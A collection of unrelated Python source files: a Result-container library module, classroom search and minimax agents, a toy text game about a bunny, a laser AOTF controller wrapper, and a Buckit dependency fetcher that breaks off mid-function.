>>> Failure('a').map(mappable) == Failure('a')
True
"""
return self
def bind(self, function):
"""
Returns the '_Failure' instance that was used to call the method.
.. code:: python
>>> def bindable(string: str) -> Result[str, str]:
... return Success(string + 'b')
...
>>> Failure('a').bind(bindable) == Failure('a')
True
"""
return self
def fix(self, function):
"""
Applies function to the inner value.
        Applies 'function' to the contents of the '_Failure' instance
and returns a new '_Success' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def fixable(arg: str) -> str:
... return 'ab'
...
>>> Failure('a').fix(fixable) == Success('ab')
True
"""
return _Success(function(self._inner_value))
def rescue(self, function):
"""
Applies 'function' to the result of a previous calculation.
'function' should accept a single "normal" (non-container) argument
        and return a ``Result``, i.e. a '_Failure' or '_Success' object.
.. code:: python
>>> def rescuable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Failure('a').rescue(rescuable) == Success('ab')
True
"""
return function(self._inner_value)
def alt(self, function):
"""
Applies function to the error value.
Applies 'function' to the contents of the '_Failure' instance
and returns a new '_Failure' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def altable(arg: str) -> Result[str, str]:
... return arg + 'b'
...
>>> Failure('a').alt(altable) == Failure('ab')
True
"""
return _Failure(function(self._inner_value))
def value_or(self, default_value):
"""
Returns the value if we deal with '_Success' or default otherwise.
.. code:: python
>>> Failure(1).value_or(2)
2
"""
return default_value
def unwrap(self):
"""
Raises an exception, since it does not have a value inside.
.. code:: python
>>> Failure(1).unwrap()
Traceback (most recent call last):
...
returns.primitives.exceptions.UnwrapFailedError
"""
if isinstance(self._inner_value, Exception):
raise UnwrapFailedError(self) from self._inner_value
raise UnwrapFailedError(self)
def failure(self):
"""
Unwraps inner error value from failed container.
.. code:: python
>>> Failure(1).failure()
1
"""
return self._inner_value
@final
class _Success(Result[_ValueType, Any]):
"""
Represents a calculation which has succeeded and contains the result.
Contains the computation value.
Should not be used directly.
"""
_inner_value: _ValueType
def __init__(self, inner_value: _ValueType) -> None:
"""Required for typing."""
super().__init__(inner_value)
def map(self, function): # noqa: A003
"""
Applies function to the inner value.
Applies 'function' to the contents of the '_Success' instance
and returns a new '_Success' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def mappable(string: str) -> str:
... return string + 'b'
...
>>> Success('a').map(mappable) == Success('ab')
True
"""
return _Success(function(self._inner_value))
def bind(self, function):
"""
Applies 'function' to the result of a previous calculation.
'function' should accept a single "normal" (non-container) argument
        and return a ``Result``, i.e. a '_Failure' or '_Success' object.
.. code:: python
>>> def bindable(string: str) -> Result[str, str]:
... return Success(string + 'b')
...
>>> Success('a').bind(bindable) == Success('ab')
True
"""
return function(self._inner_value)
def fix(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def fixable(arg: str) -> str:
... return 'ab'
...
>>> Success('a').fix(fixable) == Success('a')
True
"""
return self
def rescue(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def rescuable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Success('a').rescue(rescuable) == Success('a')
True
"""
return self
def alt(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def altable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Success('a').alt(altable) == Success('a')
True
"""
return self
def value_or(self, default_value):
"""
Returns the value if we deal with '_Success' or default otherwise.
.. code:: python
>>> Success(1).value_or(2)
1
"""
return self._inner_value
def unwrap(self):
"""
Returns the unwrapped value from the inside of this container.
.. code:: python
>>> Success(1).unwrap()
1
"""
return self._inner_value
def failure(self):
"""
Raises an exception, since it does not have an error inside.
.. code:: python
>>> Success(1).failure()
Traceback (most recent call last):
...
returns.primitives.exceptions.UnwrapFailedError
"""
raise UnwrapFailedError(self)
Result.success_type = _Success
Result.failure_type = _Failure
def Success( # noqa: N802
inner_value: _ValueType, # type: ignore
) -> Result[_ValueType, NoReturn]:
"""Public unit function of protected `_Success` type."""
return _Success(inner_value)
def Failure( # noqa: N802
inner_value: _ErrorType, # type: ignore
) -> Result[NoReturn, _ErrorType]:
"""Public unit function of protected `_Failure` type."""
return _Failure(inner_value)
@overload
def safe( # type: ignore
function: Callable[..., Coroutine[_FirstType, _SecondType, _ValueType]],
) -> Callable[
...,
Coroutine[_FirstType, _SecondType, Result[_ValueType, Exception]],
]:
"""Case for async functions."""
@overload
def safe(
function: Callable[..., _ValueType],
) -> Callable[..., Result[_ValueType, Exception]]:
"""Case for regular functions."""
def safe(function): # noqa: C901
"""
    Decorator to convert an exception-throwing function into a 'Result' container.
Should be used with care, since it only catches 'Exception' subclasses.
It does not catch 'BaseException' subclasses.
Supports both async and regular functions.
>>> @safe
... def might_raise(arg: int) -> float:
... return 1 / arg
...
>>> might_raise(1) == Success(1.0)
True
>>> isinstance(might_raise(0), _Failure)
True
"""
if iscoroutinefunction(function):
async def decorator(*args, **kwargs): # noqa: WPS430
try:
return Success(await function(*args, **kwargs))
except Exception as exc:
return Failure(exc)
else:
def decorator(*args, **kwargs): # noqa: WPS430
try:
return Success(function(*args, **kwargs))
except Exception as exc:
return Failure(exc)
return wraps(function)(decorator)
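# Editor-added usage sketch (hedged): chaining the containers defined above in
# "railway oriented" style; the parsing example itself is illustrative only.
if __name__ == '__main__':
    def _parse_int(raw: str) -> Result[int, Exception]:
        return safe(int)(raw)
    def _reciprocal(number: int) -> Result[float, Exception]:
        return safe(lambda value: 1 / value)(number)
    # happy path: both steps succeed and the value is extracted with a default
    print(_parse_int('4').bind(_reciprocal).value_or(None))     # 0.25
    # failure path: the first step fails, the second is skipped entirely
    print(_parse_int('oops').bind(_reciprocal).value_or(None))  # None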
|
import util
"""
Data structures we will use are stack, queue and priority queue.
Stack: first in last out
Queue: first in first out
collection.push(element): insert element
    element = collection.pop(): get and remove element from collection
Priority queue:
pq.update('eat', 2)
pq.update('study', 1)
pq.update('sleep', 3)
pq.pop() will return 'study' because it has highest priority 1.
"""
"""
problem is a object has 3 methods related to search state:
problem.getStartState()
Returns the start state for the search problem.
problem.isGoalState(state)
Returns True if and only if the state is a valid goal state.
problem.getChildren(state)
For a given state, this should return a list of tuples, (next_state,
step_cost), where 'next_state' is a child to the current state,
and 'step_cost' is the incremental cost of expanding to that child.
"""
def myDepthFirstSearch(problem):
visited = {}
frontier = util.Stack()
frontier.push((problem.getStartState(), None))
while not frontier.isEmpty():
state, prev_state = frontier.pop()
if problem.isGoalState(state):
solution = [state]
while prev_state != None:
solution.append(prev_state)
prev_state = visited[prev_state]
return solution[::-1]
if state not in visited:
visited[state] = prev_state
for next_state, step_cost in problem.getChildren(state):
frontier.push((next_state, state))
return []
def myBreadthFirstSearch(problem):
# YOUR CODE HERE
visited = {}
frontier = util.Queue()
frontier.push((problem.getStartState(), None))
while not frontier.isEmpty():
state, prev_state = frontier.pop()
if problem.isGoalState(state):
solution = [state]
while prev_state != None:
solution.append(prev_state)
prev_state = visited[prev_state]
return solution[::-1]
if state not in visited:
visited[state] = prev_state
for next_state, step_cost in problem.getChildren(state):
frontier.push((next_state, state))
#util.raiseNotDefined()
return []
def myAStarSearch(problem, heuristic):
    # YOUR CODE HERE
    frontier = util.PriorityQueue()
    start_state = problem.getStartState()
    # each frontier entry is [state, cost so far g(n), path to state]
    frontier.push([start_state, 0, []], heuristic(start_state))
    closed = []
    while not frontier.isEmpty():
        [state, cost, path] = frontier.pop()
        if problem.isGoalState(state):
            return path + [state]
        if state not in closed:
            closed.append(state)
            for child_state, child_cost in problem.getChildren(state):
                new_cost = cost + child_cost
                new_path = path + [state]
                # priority is f(n) = g(n) + h(n)
                frontier.push([child_state, new_cost, new_path], new_cost + heuristic(child_state))
    #util.raiseNotDefined()
    return []
"""
Game state has 4 methods we can use.
state.isTerminated()
Return True if the state is terminated. We should not continue to search if the state is terminated.
state.isMe()
Return True if it's time for the desired agent to take action. We should check this function to determine whether an agent should maximum or minimum the score.
state.getChildren()
Returns a list of legal state after an agent takes an action.
state.evaluateScore()
Return the score of the state. We should maximum the score for the desired agent.
"""
class MyMinimaxAgent():
def __init__(self, depth):
self.depth = depth
def minimax(self, state, depth):
if depth==0 or state.isTerminated():
return None, state.evaluateScore()
best_state, best_score = None, -float('inf') if state.isMe() else float('inf')
def Max_s(a,b,c,d):
if(a>c):
return a,b
else:
return c,d
def Min_s(a,b,c,d):
if(a<c):
return a,b
else:
return c,d
for child in state.getChildren():
# YOUR CODE HERE
#util.raiseNotDefined()
if state.isMe():
ghost,min_score=self.minimax(child,depth)
best_score,best_state=Max_s(best_score,best_state,min_score,child)
elif child.isMe():
agent,max_score=self.minimax(child,depth-1)
best_score,best_state=Min_s(best_score,best_state,max_score,child)
else:
ghost,min_score=self.minimax(child,depth)
best_score,best_state=Min_s(best_score,best_state,min_score,child)
return best_state, best_score
def getNextState(self, state):
best_state, _ = self.minimax(state, self.depth)
return best_state
class MyAlphaBetaAgent():
def __init__(self, depth):
self.depth = depth
def minimax(self, state, depth,a,b):
if depth==0 or state.isTerminated():
return None, state.evaluateScore()
best_state, best_score = None, -float('inf') if state.isMe() else float('inf')
def Max_s(a,b,c,d):
if(a>c):
return a,b
else:
return c,d
def Min_s(a,b,c,d):
if(a<c):
return a,b
else:
return c,d
for child in state.getChildren():
# YOUR CODE HERE
#util.raiseNotDefined()
if state.isMe():
ghost,min_score=self.minimax(child,depth,a,b)
best_score,best_state=Max_s(best_score,best_state,min_score,child)
if best_score > b:
return best_state, best_score
a = max(a, best_score)
elif child.isMe():
agent,max_score=self.minimax(child,depth-1,a,b)
best_score,best_state=Min_s(best_score,best_state,max_score,child)
if best_score < a:
return best_state, best_score
b = min(b, best_score)
else:
ghost,min_score=self.minimax(child,depth,a,b)
best_score,best_state=Min_s(best_score,best_state,min_score,child)
if best_score < a:
return best_state, best_score
b = min(b, best_score)
return best_state, best_score
def getNextState(self, state):
# YOUR CODE HERE
#util.raiseNotDefined()
best_state, _ = self.minimax(state, self.depth,-float('inf'), float('inf'))
return best_state
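# Editor-added usage sketch (hedged): tiny self-contained checks for the search
# functions and game-tree agents above.  The number-line problem and the toy
# game tree are illustrative only; they just expose the interfaces described in
# the docstrings at the top of this file (and assume ``util`` provides the
# Stack/Queue/PriorityQueue mentioned there).
if __name__ == '__main__':
    class _LineProblem:
        """Walk from 0 to 3 on the integer number line; every step costs 1."""
        def getStartState(self):
            return 0
        def isGoalState(self, state):
            return state == 3
        def getChildren(self, state):
            return [(state - 1, 1), (state + 1, 1)]
    print(myDepthFirstSearch(_LineProblem()))                   # expected [0, 1, 2, 3]
    print(myBreadthFirstSearch(_LineProblem()))                 # expected [0, 1, 2, 3]
    print(myAStarSearch(_LineProblem(), lambda s: abs(3 - s)))  # expected [0, 1, 2, 3]
    class _ToyState:
        """Minimal two-ply game-tree node for the minimax agents."""
        def __init__(self, score, children=(), me=True):
            self._score, self._children, self._me = score, list(children), me
        def isTerminated(self):
            return not self._children
        def isMe(self):
            return self._me
        def getChildren(self):
            return self._children
        def evaluateScore(self):
            return self._score
    left = _ToyState(0, [_ToyState(3), _ToyState(5)], me=False)   # opponent takes min -> 3
    right = _ToyState(0, [_ToyState(2), _ToyState(9)], me=False)  # opponent takes min -> 2
    root = _ToyState(0, [left, right], me=True)
    print(MyMinimaxAgent(2).getNextState(root) is left)           # expected True
    print(MyAlphaBetaAgent(2).getNextState(root) is left)         # expected True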
|
<gh_stars>0
#!/usr/bin/env python
import time
import os
import platform
def clearScreen():
"""#Method for clearing the screen"""
if platform.system() == 'Windows':
os.system('cls')
else:
os.system('clear')
clearScreen()
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@ THE BUNNY GAME @@@")
print("@@@ This is a simple program i wipped up, you could @@@")
print("@@@ call it a game, i suppose. No its not a game. @@@")
print("@@@ don't call it that, EVER. Oh well this not game @@@")
print("@@@ has 5 err i mean 4 commands, its pretty self @@@")
print("@@@ explanitory. just play it. If this program closes, @@@")
print("@@@ you lose @@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
# This just says wait until enter is pressed
wait = input("\n Press enter to continue ...")
clearScreen()
loop = 0
while loop < 1:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(1.5)
print("What do you want to do with it?")
print(" 1) Pet")
print(" 2) Poke")
print(" 3) Tell Joke")
print(" 4) Steal nose")
choice = int(input("Choice: "))
clearScreen()
if choice == 1:
time.sleep(1.5)
print(" (\__/) Bunny like pets. Now let me sleep.")
print(" ( -.-) That means leave. ")
print(" C(\")(\") ")
time.sleep(5)
print(" umm, I think its best to do what it says.... ")
wait = input("\n Press enter to continue ...")
clearScreen()
elif choice == 2:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/)")
print(" ( 0.0)")
print(" C(\")(\")")
print(" WHO STOLE MY CARROTS???")
print(" I WILL DESTROY THE WOLRD")
print(" MWAHAHA")
time.sleep(2.5)
count = 10
def countdown(count):
while (count >= 0):
clearScreen()
print(count)
count -= 1
time.sleep(1)
countdown(10)
clearScreen()
print("SOMEONE POKED THE BUNNY. THE WORLD IS OVER.")
print("Guess the bunny beat those terrorists to it...")
break
elif choice == 3:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(1.5)
print(" random joke im to lazy to think of")
time.sleep(3)
clearScreen()
print(" (\__/) gasp")
print(" ( 0.0)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/) Giggle, lol")
print(" ( *.*)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" You made the bunny laugh, awwww cute.")
wait = input("\n Press enter to continue ...")
clearScreen()
elif choice == 4:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
print(" hey bunny")
time.sleep(3)
clearScreen()
print(" (\__/) ?")
print(" ( o.o)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/) ?")
print(" ( o o)")
print(" C(\")(\")")
print(" I got your nose")
time.sleep(3)
clearScreen()
print(" (\__/) AHHHHH!!")
print(" ( o o)")
print(" C(\")(\")")
time.sleep(4)
clearScreen()
print("You stole the bunny's nose. why did you do that??? \nWhy??")
time.sleep(3)
wait = input("\n Press enter")
clearScreen()
break
elif choice == 5:
name = "carl"
while name != "bunny":
name = input("Name: ")
if name == "bunny":
clearScreen()
print("Congratulations! you have won the game!\n")
print("When i first made the game a song played here")
print("I did not include it for copyright reasons."
"Thanks for playing")
wait = input("\n Press enter")
clearScreen()
loop = 1
else:
print("EXTERMANATE!!!, wait sorry WRONG USER")
|
# A python wrapper for Fianium supercontinuum laser coupled with AOTF controller
# Original code by <NAME>
# Adapted by <NAME>
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
import ctypes
import types
import time
import sys
import numpy as np
from time import sleep
d = ctypes.cdll.LoadLibrary('AotfLibrary.dll')
import atexit, string
class fianium_aotf():
def __init__(self):
self.aotf_serial_number = "***************"
self.aotf_serial_number_2 = "*************"
#Initialize aotf power as well as vis/nir channel id
self.last_power = 0.
self._id_ir = 0
self._id_vis = 0
self.vis_on = False
self.ir_on = False
#Parameters used to calculate RF frequency of aotf controller
self.aotf_poly_coef_vis = [-6.82179219e-17,3.27832863e-13,-6.73661923e-10,7.68686873e-07,-5.27585574e-04, 2.18972280e-01, -5.14687930e+01, 5.48569847e+03]
self.aotf_poly_coef_nir = [1.25692660e-17,-7.01326532e-14,1.65065114e-10,-2.11753075e-07,1.59015648e-04,-6.90936212e-02,1.55775592e+01,-1.19330653e+03]
self.aotf_poly_vis = np.poly1d(self.aotf_poly_coef_vis)
self.aotf_poly_nir = np.poly1d(self.aotf_poly_coef_nir)
        self.MAX_POWER = 5000 #Max AOTF power
self.red_edge = 800. #Max wavelength for visible channel
atexit.register(self._close)
def get_serial(self, prefix):
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ser_cmd = "Boardid serial \r"
d.AotfWrite(prefix, len(ser_cmd), ser_cmd)
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ret = ''
for i in range(0, 1000):
time.sleep(0.002)
if d.AotfIsReadDataAvailable(prefix):
val = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
ret += strbuf.value
print "sn ", ret
return ret
def _open(self):
#Connect to AOTF controller
self._id_vis = d.AotfOpen(0)
ser1 = self.get_serial(self._id_vis)
self._id_ir = d.AotfOpen(1)
ser2 = self.get_serial(self._id_ir)
if (self.aotf_serial_number in ser1) or (self.aotf_serial_number_2 in ser2):
pass
elif (self.aotf_serial_number in ser2) or (self.aotf_serial_number_2 in ser1):
self._id_ir, self._id_vis = self._id_vis, self._id_ir
else:
raise ValueError('AOTF open failed: can not find device with serial number '+self.aotf_serial_number)
return False
def _close(self):
d.AotfClose(self._id_ir)
d.AotfClose(self._id_vis)
def send_cmd(self, cmd, prefix):
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
for i in range(100):
sleep(0.000001)
if d.AotfIsReadDataAvailable(prefix):
ret = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
d.AotfWrite(prefix, len(cmd), cmd)
time.sleep(0.020)
strbuf = ctypes.create_string_buffer(1)
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ret = ''
for i in range(100):
sleep(0.000001)
if d.AotfIsReadDataAvailable(prefix):
ret = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
return ret
def enable(self):
s = 'dau en\r dau gain 0 255\r'
self.send_cmd(s, self._id_ir)
self.send_cmd(s, self._id_vis)
def set_wlen(self,wlen,aotf=None):
#Set laser wavelength
if "vis" in aotf:
freq = self.aotf_poly_vis(wlen)
s = 'dds freq 0 %0.3f \r' % (freq)
self.send_cmd(s, self._id_vis)
self.vis_on = True
elif "nir" in aotf:
freq = self.aotf_poly_nir(wlen)
print "freq = ", freq
s = 'dds freq 0 %0.3f \r' % (freq)
self.send_cmd(s, self._id_ir)
self.ir_on = True
def set_pwr(self,power,aotf=None):
#Set laser power
self.last_power = power
if "vis" in aotf:
val = int(power*self.MAX_POWER/100.)
s = 'dds amplitude 0 %d \r' % (val)
self.send_cmd(s, self._id_vis)
elif "nir" in aotf:
val = int(power*self.MAX_POWER/100.)
s = 'dds amplitude 0 %d \r' % (val)
self.send_cmd(s, self._id_ir)
if __name__ == '__main__':
aotf = fianium_aotf()
aotf._open()
print "Aotf open"
aotf.enable()
print "Aotf enable"
time.sleep(0.5)
aotf.set_wlen(450, aotf="vis")
print "Aotf vis set wavelength"
aotf.set_pwr(100, aotf="vis")
print "Aotf vis set power"
aotf.set_wlen(700, aotf="nir")
print "Aotf nir set wavelength"
aotf.set_pwr(0, aotf="nir")
print "Aotf ir set power"
|
#!/usr/bin/env python3
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import glob
import hashlib
import logging
import os
import platform
import shlex
import shutil
import subprocess
import tempfile
from collections import namedtuple
from configure_buck import find_project_root, update_config
from constants import BUCKFILE, BUCKCONFIG
from formatting import readable_check_call
from helpers import BuckitException
from textwrap import indent, dedent
PipPythonSettings = namedtuple(
'PipPythonSettings', [
'virtualenv_command',
'virtualenv_root',
'pip_package',
'pip_version',
'prefix_subdir',
]
)
class CachedFetcher:
def should_fetch(self, destination, force):
src_dest = os.path.join(destination, 'src')
return not os.path.exists(src_dest) or force
def populate_cache(self, destination, use_proxy):
raise BuckitException('Not implemented')
def fetch(self, project_root, destination, use_proxy):
destination = os.path.join(destination, 'src')
if os.path.isdir(destination):
return
# Make sure that our parent dir exists
if not os.path.exists(os.path.split(destination)[0]):
os.makedirs(os.path.split(destination)[0], 0o0755)
yarn_cache = os.path.join(os.path.expanduser('~'), '.cache', 'yarn')
if not os.path.exists(yarn_cache):
yarn_cache = os.path.join(os.path.expanduser('~'), '.yarn-cache')
if not os.path.exists(yarn_cache):
os.makedirs(yarn_cache)
clean_package_name = self.package_name.replace('/',
'_').replace('\\', '_')
clean_version = self.version().replace('/', '_').replace('\\', '_')
cache_dir_name = 'buckit-fetch-{}-{}'.format(
clean_package_name, clean_version
)
cache_dir = os.path.join(yarn_cache, cache_dir_name)
if not os.path.exists(cache_dir):
logging.debug(
"{bold}Downloading %s to cache directory at %s{clear}",
self.package_name, cache_dir
)
self.populate_cache(cache_dir, use_proxy)
tmp_destination = tempfile.mkdtemp(dir=os.path.split(destination)[0])
logging.debug(
"{bold}Cached download at %s exists, copying to %s{clear}",
cache_dir, tmp_destination
)
# Dir needs to not exist for copytree, but we want mkdtemp for guaranteed
# unique temp dir next to destination
tmp_subdir = os.path.join(
tmp_destination, os.path.split(destination)[1]
)
try:
shutil.copytree(cache_dir, tmp_subdir, symlinks=True)
shutil.move(tmp_subdir, destination)
finally:
if os.path.exists(tmp_destination):
shutil.rmtree(tmp_destination)
class GitFetcher(CachedFetcher):
def __init__(self, package_name, json_file, url, commit, tag):
if bool(commit) == bool(tag):
raise BuckitException(
"{}: Either the commit, or the tag must be specified",
json_file)
self.package_name = package_name
self.url = url
self.commit = commit
self.tag = tag
def version(self):
return self.commit or self.tag
def populate_cache(self, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
tmp_dir = tempfile.mkdtemp(dir=os.path.split(destination)[0])
out_dir = os.path.join(tmp_dir, 'outdir')
try:
if self.commit:
# Github and the like don't seem to let you do git fetch <sha>
# so we have to do a heavy weight clone
readable_check_call(
['git', 'clone', '--recursive', self.url, out_dir],
'cloning repo'
)
readable_check_call(
['git', 'checkout', self.commit],
'checking out specific commit',
cwd=out_dir
)
else:
if platform.system() == 'Darwin':
# For now short circuit shallow submodules on osx
# because things are terrible there.
shallow_submodules = []
else:
shallow_submodules = ['--shallow-submodules']
readable_check_call(
[
'git',
'clone',
'--branch',
self.tag,
'--depth',
'1',
'--recursive',
] + shallow_submodules + [self.url, out_dir], 'cloning repo'
)
logging.info(
"Checked out %s to %s, moving it to %s", self.url, out_dir,
destination
)
shutil.move(out_dir, destination)
finally:
shutil.rmtree(tmp_dir)
class HttpTarballFetcher(CachedFetcher):
HASH_BUFFER_SIZE = 64 * 1024
def __init__(self, package_name, json_file, url, sha256):
self.package_name = package_name
self.url = url
self.sha256 = sha256
def version(self):
return self.sha256
def populate_cache(self, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
tmp_dir = tempfile.mkdtemp(dir=os.path.split(destination)[0])
tmp_file = os.path.join(tmp_dir, 'output_file')
try:
readable_check_call(
['curl', self.url, '-L', '-o', tmp_file],
'fetching {}'.format(self.url)
)
self.check_hash(tmp_file)
readable_check_call(
['tar', 'xf', tmp_file, '-C', tmp_dir],
'extracting {}'.format(tmp_file)
)
os.remove(tmp_file)
main_dir = glob.glob(os.path.join(tmp_dir, '*'))[0]
logging.info("{bold}Moving %s to %s", main_dir, destination)
shutil.move(main_dir, destination)
finally:
shutil.rmtree(tmp_dir)
def check_hash(self, filename):
file_hash = hashlib.sha256()
with open(filename, 'rb') as fin:
while True:
data = fin.read(self.HASH_BUFFER_SIZE)
if not data:
break
file_hash.update(data)
if file_hash.hexdigest() != self.sha256:
raise BuckitException(
'SHA256 of downloaded file didn\'t match! Expected {}, got {}',
self.sha256, file_hash.hexdigest())
class PipFetcher:
def __init__(
self, package_name, json_file, pip2_package, pip2_version, pip3_package,
pip3_version, main_rule, buck_deps, python_settings
):
self.package_name = package_name
self.main_rule = main_rule
self.buck_deps = buck_deps
self.python2 = None
self.python3 = None
if pip2_package and python_settings.use_python2:
self.python2 = PipPythonSettings(
python_settings.python2_virtualenv_command,
python_settings.python2_virtualenv_root,
pip2_package,
pip2_version,
'py2',
)
if pip3_package and python_settings.use_python3:
self.python3 = PipPythonSettings(
python_settings.python3_virtualenv_command,
python_settings.python3_virtualenv_root,
pip3_package,
pip3_version,
'py3',
)
self.python2_files = {"srcs": {}, "bins": {}}
self.python3_files = {"srcs": {}, "bins": {}}
if not main_rule:
raise BuckitException(
'A main_rule attribute must be set in {}', json_file)
def should_fetch(self, destination, force):
buckfile = os.path.join(destination, BUCKFILE)
return not os.path.exists(buckfile) or force
def fetch(self, project_root, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
if not os.path.exists(destination):
os.makedirs(destination)
if self.python2:
self.python2_files = self.install_and_get_files(
self.python2,
'pip',
env,
)
self.setup_install_prefix(self.python2, destination)
if self.python3:
self.python3_files = self.install_and_get_files(
self.python3, 'pip', env
)
self.setup_install_prefix(self.python3, destination)
buckfile = os.path.join(destination, BUCKFILE)
with open(buckfile, 'w') as fout:
fout.write('\n'.join(self.buckfile()))
if self.python2 or self.python3:
read_only_props = {'project': {'read_only_paths': []}}
project_root = find_project_root(destination)
relative_path = os.path.relpath(destination, project_root)
if self.python2:
read_only_props['project']['read_only_paths'].append(
os.path.join(relative_path, 'py2')
)
if self.python3:
read_only_props['project']['read_only_paths'].append(
os.path.join(relative_path, 'py3')
)
read_only_props['project']['read_only_paths'] = ','.join(
read_only_props['project']['read_only_paths']
)
buckconfig = os.path.join(project_root, BUCKCONFIG)
update_config(project_root, buckconfig, read_only_props)
def buckfile(self):
ret = []
py2_srcs = ""
py3_srcs = ""
if self.python2:
py2_srcs = '\n'.join(
[
'r"{}": r"{}",'.format(
module_path,
os.path.join(self.python2.prefix_subdir, venv_relative)
)
for venv_relative, module_path in self.python2_files["srcs"]
.items()
]
)
if self.python3:
py3_srcs = '\n'.join(
[
'r"{}": r"{}",'.format(
module_path,
os.path.join(self.python3.prefix_subdir, venv_relative)
)
for venv_relative, module_path in self.python3_files["srcs"]
.items()
]
)
deps = '\n'.join(['"{}",'.format(dep) for dep in self.buck_deps])
ret.append(
dedent(
"""
__py2_srcs = {{
{py2_srcs}
}}
__py3_srcs = {{
{py3_srcs}
}}
__preferred_srcs = __py3_srcs
if read_config('buckit', 'python_version', '') == '2':
__preferred_srcs = __py2_srcs
python_library(
name="{name}",
srcs=__preferred_srcs,
platform_srcs=[
('py2.*', __py2_srcs),
('py3.*', __py3_srcs),
],
deps=[
{deps}
],
visibility=['PUBLIC'],
)
"""
).format(
name=self.main_rule,
py2_srcs=indent(py2_srcs, ' ' * 4),
py3_srcs=indent(py3_srcs, ' ' * 4),
deps=indent(deps, ' ' * 8)
)
)
for name, path in self.python3_files["bins"].items():
ret.append(
dedent(
"""
if read_config('buckit', 'python_version', '3') == '3':
sh_binary(
name="{name}",
main=r"{path}",
)
"""
).format(name=name, path=path)
)
for name, path in self.python2_files["bins"].items():
ret.append(
dedent(
"""
if read_config('buckit', 'python_version', '3') == '2':
sh_binary(
name="{name}",
main=r"{path}",
)
"""
).format(name=name, path=path)
)
return ret
def parse_pip_output(self, python_settings, output):
found_bins = []
found_files = []
found_files_line = False
location = ''
for line in output.splitlines():
if line == 'Files:':
found_files_line = True
elif line.startswith('Location:'):
location = line.split(':', 2)[1].strip()
elif found_files_line:
if not line.startswith(' '):
found_files_line = False
continue
normalized = os.path.normpath(line.strip())
if normalized.endswith('.py'):
found_files.append(normalized)
elif 'bin' in normalized.split(os.sep):
found_bins.append(normalized)
return self.transform_pip_output(
python_settings, location, found_files, found_bins
)
def transform_pip_output(
self, python_settings, location, found_files, found_bins
):
bins = {}
files = {}
# Get the path relative to the root of the venv so that we can put that
# in the buck file, and remap it to the path within system-packages
# so that you can import the module properly
for path in found_files:
full_path = os.path.normpath(os.path.join(location, path))
if full_path.startswith(python_settings.virtualenv_root + os.sep):
venv_relative_path = full_path[
len(python_settings.virtualenv_root) + len(os.sep):
]
else:
venv_relative_path = path
files[venv_relative_path] = path
for path in found_bins:
full_path = os.path.normpath(os.path.join(location, path))
if full_path.startswith(python_settings.virtualenv_root + os.sep):
venv_relative_path = full_path[
len(python_settings.virtualenv_root) + len(os.sep):
]
else:
venv_relative_path = path
bins[os.path.split(path)[1]] = venv_relative_path
return {"srcs": files, "bins": bins}
def install_and_get_files(self, python_settings, pip_command, env):
# TODO: Windows
activate_path = os.path.join(
python_settings.virtualenv_root, 'bin', 'activate'
)
if (not os.path.exists(python_settings.virtualenv_root) or
not os.path.exists(activate_path)):
logging.info(
"Virtualenv at %s does not exist, creating",
python_settings.virtualenv_root
)
readable_check_call(
python_settings.virtualenv_command +
[python_settings.virtualenv_root],
"installing python virtual env",
env=env,
)
package = shlex.quote(
python_settings.pip_package + (python_settings.pip_version or '')
)
command = (
"source bin/activate && {pip} install -I {package} && "
"{pip} show -f {package}"
).format(
pip=pip_command, package=package
)
logging.info(
"Installing %s via pip with %s in %s", package, command,
python_settings.virtualenv_root
)
proc = subprocess.Popen(
args=command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=python_settings.virtualenv_root,
shell=True,
env=env,
)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
logging.error(
